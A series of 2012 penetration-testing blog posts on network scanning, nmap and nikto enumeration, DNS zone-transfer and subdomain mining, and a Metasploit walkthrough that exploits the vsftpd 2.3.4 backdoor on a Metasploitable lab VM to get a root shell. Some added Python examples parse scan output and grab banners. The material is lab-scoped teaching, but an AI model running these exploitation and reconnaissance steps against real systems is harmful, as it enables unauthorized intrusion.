Tuesday, November 27, 2012

Gaining Access Using Metasploit

As promised in my Enumeration post, let's take a look at using Metasploit against our Metasploitable test server.  If you recall the output, there were many vulnerabilities we could attempt to exploit, but let's start off slow and tackle an easy one first.

Of course we will use Metasploit, but more specifically we will use the msfconsole interface.  Why not use the GUI?  Simply put, command line interfaces are easier to automate through scripts, and the goal of any good IT professional is to automate as much of their workload as possible.

So, from your BackTrack 5R2 machine, open a terminal and type:
msfconsole

Depending on the speed of your machine, it could take a minute or two before you see any movement.  This is even more noticeable if you are using a bootable version, so have patience.  Once you get a command prompt back, the easiest way to find an exploit is to search for it using the search command.  Let's pick on vsftpd and see what exploits are available.

msf > search vsftpd

Matching Modules
=================

Name     Disclosure Date  Rank    Description
----     ---------------  ----    -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 00:00:00 UTC excellent  VSFTPD v2.3.4 Backdoor Command Execution

A backdoor; that sounds promising, so let's use that one.  To do so, enter the following command:
use exploit/unix/ftp/vsftpd_234_backdoor

You will note that your command prompt changes to include the exploit.  To see what options are available, type: show options
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required  Description
---- --------------- --------  -----------
RHOST   yes   The target address
RPORT 21  yes   The target port

Exploit target:

Id  Name
--  ----
0   Automatic


To see what payloads are available use the show payloads command.
msf exploit(vsftpd_234_backdoor) > show payloads

Compatible Payloads
==================

Name    Disclosure Date  Rank    Description
----    ---------------  ----    -----------
cmd/unix/interact       normal  Unix Command, Interact with Established Connection

Before we can exploit our target we need to set some options and pick a payload.  For this exploit it's fairly straightforward, since we only have to set the target IP address and select the only payload available (you'll note the target port number is already set to 21).

To set the target IP address enter:
set RHOST 192.168.10.107

To set the payload enter:
set payload cmd/unix/interact

And to exploit simply enter:
exploit

If all goes well you should receive some output that looks like this.
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.10.100:51396 -> 192.168.10.107:6200) at 2012-11-26 19:30:23 -0600

You will also note that you do not receive a command prompt back.  This is because you are now on your target system.  To prove this, enter a command like ifconfig; you should see the IP information for your target.  Since we are root, we are free to do just about anything we want, such as create a user, install a rootkit, start/stop daemons, etc.  To get back to the msfconsole interface while leaving the session running, use Ctrl+Z.  If you exit or use the Ctrl+C combination you will close the session to your target.

Now this is a very simple exploit that is well documented, so we're definitely not breaking new ground here.  This is just an example of how we can use Metasploit to gain access after finding a vulnerable service during a scan.

Next we'll look at a few more advanced options of Metasploit and start digging into some automation.

Until next time, thanks for reading.

Michael

Monday, November 19, 2012

Enumeration - DNS

Given the volume of data I'm uncovering related to enumeration, I wanted to spend a bit more time talking about it.  In this post we'll focus on enumerating DNS.

DNS, or Domain Name System, is really in place for us humans.  Computers work much better with numbers and we humans do much better with words, so we need a translator.

With that said, there is a wealth of knowledge to be gleaned from DNS.  Here are a few techniques and tools I've been playing with that I thought you would enjoy too.

Although not a very relevant attack today, one easy vector was to do a DNS zone transfer.  A zone transfer is legitimately used to replicate DNS records from one DNS server to another.  However legitimate, if misconfigured it can be abused.

You can test to see if anonymous zone transfers are allowed by using the following command in BackTrack 5R2:  host -al domain_name.com (where domain_name.com is the target domain you are trying to transfer).

One tool I've used to enumerate DNS information is dnsmap.  Dnsmap allows you to automate the mining process by searching for a predefined list of subdomains (of course you are free to add your own).

To do this on BackTrack 5R2 execute:
/pentest/enumeration/dns/dnsmap/dnsmap domain_name.com (where domain_name.com is the target you are trying to mine).  The output is clean and well organized for viewing on a screen (a bit clunky for scripting against, I would think).

Another great tool I've been looking at is a Python script called dnsrecon.py.  Dnsrecon has many more options than dnsmap; however, with more options comes more configuration.  Like nmap, we need to sit down and figure out what we want before we start sending queries.  Here's an example I've been playing with:  dnsrecon.py -w -d domain_name.com (this will do a deep whois search and get you IP ranges for your target domain name).

Finally, I want to take a quick look at a Perl script named dnsenum.pl.  Dnsenum.pl has multiple options, much like dnsrecon.py, but it has one interesting option the other two tools lack, and that's Google scraping.  This allows you to automatically search Google for the domain name and gather those results too.

So in short, don't forget about DNS.  There are a lot of good tools to mine DNS and give you valuable insight into that domain name.

Michael

Monday, November 5, 2012

Enumeration

Let me start by stating there is a LOT of information related to enumeration.  Due to time restrictions I am going to focus this post on enumerating web servers.

Let's start by taking a deeper look at nmap.  Nmap has a lot of great features for this type of work, but before we start selecting options don't forget to keep the scope of the assessment in mind.  If you are limited by time you may need to speed up your scans, which of course could impact accuracy.  If accuracy can't be sacrificed then you may need to scale back what you scan for.  It's an interesting balancing act when it comes down to it.

Our basic nmap scan was: nmap -n -sT 192.168.10.0/24.  This is great for telling us what hosts and ports are listening, but what about what's behind those ports?  To examine that we need to add the -sV option.  The -sV option will gather the type and version of each service running on each port.  Having the type and version of a given service is going to make our jobs much easier when it comes to exploiting it.

Exercise:
If you're playing along at home, here's a good chance to enumerate the Metasploitable VM.  From BackTrack run the command: nmap -n -sT -sV 192.168.10.107 (where the IP address is the IP of the Metasploitable VM).  Doing so you should get some output like this:
Nmap scan report for 192.168.10.107
Host is up (0.014s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE              VERSION
21/tcp   open  ftp                  vsftpd 2.3.4
22/tcp   open  ssh                  OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet               Linux telnetd
25/tcp   open  smtp                 Postfix smtpd
53/tcp   open  domain               ISC BIND 9.4.2
80/tcp   open  http                 Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind (rpcbind V2) 2 (rpc #100000)
139/tcp  open  netbios-ssn          Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn          Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec                 netkit-rsh rexecd
513/tcp  open  login
514/tcp  open  tcpwrapped
1099/tcp open  rmiregistry          GNU Classpath grmiregistry
1524/tcp open  ingreslock?
2049/tcp open  nfs (nfs V2-4)       2-4 (rpc #100003)
2121/tcp open  ftp                  ProFTPD 1.3.1
3306/tcp open  mysql                MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql           PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc                  VNC (protocol 3.3)
6000/tcp open  X11                  (access denied)
6667/tcp open  irc                  Unreal ircd
8009/tcp open  ajp13                Apache Jserv (Protocol v1.3)
8180/tcp open  http                 Apache Tomcat/Coyote JSP engine 1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
MAC Address: 08:00:27:FD:06:4F (Cadmus Computer Systems)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 128.00 seconds
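As an added example (not from the original post), here is a small Python parser for the nmap -sV output above that turns each port row into a record and flags what a defender would chase first: the vsftpd 2.3.4 release that the Metasploit post exploits, and the clear-text login services.  The sample input is a constructed subset of the scan output shown above, and the watch list is an illustrative one you would maintain yourself.

```python
import re

# Constructed sample: a subset of the nmap -sV output shown in the post.
SAMPLE_NMAP = """\
Nmap scan report for 192.168.10.107
PORT     STATE SERVICE              VERSION
21/tcp   open  ftp                  vsftpd 2.3.4
23/tcp   open  telnet               Linux telnetd
512/tcp  open  exec                 netkit-rsh rexecd
513/tcp  open  login
1524/tcp open  ingreslock?
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
"""

# One row of the nmap port table: "<port>/<proto> <state> <service> [version]"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Illustrative watch list (maintained by you): version strings to flag on sight.
# vsftpd 2.3.4 is the backdoored release the Metasploit post exploits.
VERSION_WATCHLIST = {
    "vsftpd 2.3.4": "backdoored vsftpd release; upgrade and audit the host",
}
# Services that carry credentials in clear text whatever the version.
CLEARTEXT_SERVICES = {"ftp", "telnet", "exec", "login", "shell"}

def parse_nmap_sv(text):
    """Return one dict per port row found in nmap -sV normal output."""
    rows = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if not m:
            continue  # banner lines, headers, fingerprint dumps
        port, proto, state, service, version = m.groups()
        rows.append({"port": int(port), "proto": proto, "state": state,
                     "service": service.rstrip("?"),  # '?' = nmap was unsure
                     "version": (version or "").strip()})
    return rows

def review(rows):
    """Flag open ports that match the watch list or speak a clear-text protocol."""
    findings = []
    for r in rows:
        if r["state"] != "open":
            continue
        for needle, reason in VERSION_WATCHLIST.items():
            if needle in r["version"]:
                findings.append((r["port"], reason))
        if r["service"] in CLEARTEXT_SERVICES:
            findings.append((r["port"], "clear-text protocol (%s)" % r["service"]))
    return sorted(findings)

if __name__ == "__main__":
    for port, why in review(parse_nmap_sv(SAMPLE_NMAP)):
        print("%5d/tcp  %s" % (port, why))
```

Feed it the full scan (nmap -oN) and the fingerprint dump and summary lines are skipped automatically, so the same script works on every host in the lab.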

Among all the bad things running on this box, you'll find Apache httpd 2.2.8 on port 80, Apache JServ on port 8009, and Apache Tomcat listening on 8180.  To enumerate the banners (also known as banner grabbing) we will use Netcat.  Run the following: nc -v 192.168.10.107 80 (where the IP address is the IP of the Metasploitable VM).  After entering the command hit Enter, then type GET / HTTP/1.1 and hit Enter a few more times (2 or 3 should be good).  Doing so you should get some output like this:
192.168.10.107: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.10.107] 80 (www) open
get / http/1.1

HTTP/1.1 400 Bad Request
Date: Mon, 05 Nov 2012 14:49:37 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at metasploitable.localdomain Port 80</address>
</body></html>
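Added example, not from the original post: the same banner grab done from Python so it can be scripted across many hosts.  Because the lab server is not reachable here, the block starts a throwaway localhost listener that returns a constructed copy of the Apache 400 reply above, then grabs and parses its headers.

```python
import socket
import threading

# Constructed reply, modelled on the Apache response shown in the post.
FAKE_REPLY = (b"HTTP/1.1 400 Bad Request\r\n"
              b"Server: Apache/2.2.8 (Ubuntu) DAV/2\r\n"
              b"Connection: close\r\n"
              b"Content-Type: text/html; charset=iso-8859-1\r\n"
              b"\r\n"
              b"<html><body><h1>Bad Request</h1></body></html>")

def start_fake_server():
    """Stand-in for the lab web server: answer one client on an ephemeral localhost port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        conn.recv(1024)            # consume the request; the reply is canned
        conn.sendall(FAKE_REPLY)
        conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

def banner_grab(host, port, timeout=5.0):
    """Send the same bare request typed into nc and return the response headers."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        # No Host header, so an HTTP/1.1 server answers 400, but it still
        # announces itself in the Server header, which is all we want.
        s.sendall(b"GET / HTTP/1.1\r\n\r\n")
        data = b""
        while b"\r\n\r\n" not in data:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    head = data.partition(b"\r\n\r\n")[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    headers = {"status": lines[0]}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers

if __name__ == "__main__":
    port = start_fake_server()
    hdrs = banner_grab("127.0.0.1", port)
    print(hdrs["status"], "|", hdrs.get("server", "(no Server header)"))
```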

Another good tool to use against web servers is nikto.  Nikto will test the web server for dangerous files, directories and general misconfiguration.  To run a basic scan with nikto execute the following command from BackTrack 5R2: perl /pentest/web/nikto/nikto.pl -h 192.168.10.107 (where the IP address is the IP of the Metasploitable VM).  Doing so you should get some output like this:
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.10.107
+ Target Hostname:    192.168.10.107
+ Target Port:        80
+ Start Time:         2012-11-05 06:24:17 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.19). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3233: /phpinfo.php: Contains PHP configuration information
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /phpMyAdmin/: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /test/: Directory indexing found.
+ OSVDB-3092: /test/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpMyAdmin/: phpMyAdmin directory found
+ 6474 items checked: 3 error(s) and 15 item(s) reported on remote host
+ End Time:           2012-11-05 06:30:07 (GMT-6) (350 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Next time we'll use this output to our advantage and see what we can do using Metasploit.  Until next time, thanks for reading.

Michael

Thursday, November 1, 2012

Scanning

Now that we've built a cool playground we call a lab, let's have a bit of fun.

As we talked about in a previous post, footprinting is an important first step.  But now that the recon work is done we can move into scanning / enumeration.  Depending on who you talk to, scanning and enumeration are either lumped together or treated as their own topics.  For the sake of this blog I'm going to split them into two different posts.

Let's start by looking at scanning.  When it comes to scanning there are two different types, active and passive.  Active scanning is when you send out some type of probe (packet) to see if a host is online.  You are "actively" engaging the target.  This type of scanning can be done with a variety of tools, the most popular of which is nmap.  Nmap has been with us for years and is always improving; in fact it has so many features there's a book about it.  If you haven't already, I highly recommend checking it out.

But what if nmap isn't available?  This question was put to me recently and it made me think.  I've used nmap for so long I had forgotten about other options.  Well, believe it or not there are other tools out there.  After blowing the cobwebs out of my brain (and a quick research break) I came up with a short list of tools.

Scanner    Linux  Windows  Mac OS-X  Interface   Example
-------    -----  -------  --------  ----------  --------------------------------------------
nmap       X      X        X         CLI or GUI  nmap -n -sn 192.168.10.0/24 (ping scan)
                                                 nmap -n -sT 192.168.10.0/24 (open port scan)
SuperScan  -      X        -         GUI         It's a GUI
NetCat     X      X        X         CLI         nc -zv 192.168.10.107 1-100
ScanLine   -      X        -         CLI         sl -h 192.168.10.1-254 (ping scan)
                                                 sl -ht 1-100 192.168.10.1-254 (open port scan)
Cain       -      X        -         GUI         It's a GUI

As always, this is not meant to be an all-inclusive list (far from it).  These are just a few I thought people might enjoy trying out.

So what about passive scanning?  Passive scanning is when you don't actively send out packets but rather wait until clients talk on the network.  This type of scanning is generally less reliable due to several issues.  The 5 ton elephant here is those darn switches.  By design a switch only sends packets to the port they are destined for.  This makes listening in on conversations difficult, unless you employ something like ARP spoofing.

Even when we overcome any switching issues we'll have to take into account that we're only 'listening' to traffic.  Let's say there's an FTP server running on the same machine as the web server.  If no one ever uses FTP then we might not know it's there.

On the other hand, doing passive scanning can give you a great picture of how the network is used and where data might be stored.

I haven't done a lot of work with passive scanning, but I have played with NetworkMiner.  NetworkMiner is a Windows-based tool that was ported to Linux/Unix.  You could also consider using packet capturing software such as Wireshark or TCPDump; of course there might be more work on the back end to figure out what hosts and ports are being used.  Hmm, that's an interesting idea.  I wonder if you could make a network mapping extension to TCPDump?
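As an added example (not from the original post) of the TCPDump idea above: a Python function that builds a host/port map purely from the replies in a tcpdump -n capture, so nothing is sent on the wire.  The capture lines are constructed for the lab subnet, and the map deliberately shows the blind spot mentioned above: a port nobody contacted never appears.

```python
import re

# Constructed tcpdump -n lines: two clients probing hosts on the lab subnet.
SAMPLE_TCPDUMP = """\
19:30:23.100000 IP 192.168.10.100.51396 > 192.168.10.107.21: Flags [S], seq 1, win 29200, length 0
19:30:23.100400 IP 192.168.10.107.21 > 192.168.10.100.51396: Flags [S.], seq 2, ack 2, win 5840, length 0
19:30:23.100800 IP 192.168.10.100.51396 > 192.168.10.107.21: Flags [.], ack 3, win 29200, length 0
19:30:24.200000 IP 192.168.10.100.51397 > 192.168.10.107.81: Flags [S], seq 5, win 29200, length 0
19:30:24.200300 IP 192.168.10.107.81 > 192.168.10.100.51397: Flags [R.], seq 0, ack 6, win 0, length 0
19:30:25.000000 IP 192.168.10.55.40001 > 192.168.10.107.80: Flags [S], seq 9, win 64240, length 0
19:30:25.000500 IP 192.168.10.107.80 > 192.168.10.55.40001: Flags [S.], seq 10, ack 10, win 5840, length 0
19:30:26.000000 IP 192.168.10.55.40002 > 192.168.10.12.22: Flags [S], seq 11, win 64240, length 0
19:30:26.000700 IP 192.168.10.12.22 > 192.168.10.55.40002: Flags [S.], seq 12, ack 12, win 5840, length 0
"""

# "IP <src>.<sport> > <dst>.<dport>: Flags [<flags>]" as printed by tcpdump -n
TCP_RE = re.compile(
    r"IP (\d+\.\d+\.\d+\.\d+)\.(\d+) > (\d+\.\d+\.\d+\.\d+)\.(\d+): Flags \[([^\]]*)\]")

def passive_map(text):
    """Return {host: {port: 'open' | 'closed'}} learned only from replies in the capture.

    Every address seen becomes a key, so quiet hosts still appear (with no ports).
    A SYN-ACK ([S.]) from src means src listens on sport; a RST-ACK ([R.]) to a
    probe means it does not.  Ports nobody contacted are invisible, which is the
    blind spot of passive scanning the post describes.
    """
    hosts = {}
    for line in text.splitlines():
        m = TCP_RE.search(line)
        if not m:
            continue  # ARP, UDP, ICMP and other non-TCP lines
        src, sport, dst, dport, flags = m.groups()
        hosts.setdefault(src, {})
        hosts.setdefault(dst, {})
        if flags == "S.":
            hosts[src][int(sport)] = "open"
        elif flags == "R.":
            hosts[src].setdefault(int(sport), "closed")
    return hosts

def open_ports(hosts):
    """Condense the map into sorted (host, [open ports]) pairs, quiet hosts included."""
    return sorted((h, sorted(p for p, s in ports.items() if s == "open"))
                  for h, ports in hosts.items())

if __name__ == "__main__":
    for host, ports in open_ports(passive_map(SAMPLE_TCPDUMP)):
        print("%-16s %s" % (host, ", ".join(map(str, ports)) or "(nothing seen listening)"))
```

Pipe a live capture in with tcpdump -n -l 'tcp[tcpflags] & (tcp-syn|tcp-rst) != 0' and the map grows as the network talks, without the scanner ever touching a target.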


Exercise
Since we've talked about a couple of different tools (and since we have a cool lab to play in) I would recommend trying each scanner in turn.  It's a good idea to understand what each tool is capable of before it's used on a production network.  I would also highly recommend looking through the plethora of options nmap offers.  It's also interesting to fire up Wireshark or TCPDump on your target machine so you can get an idea of what each scanner is actually doing.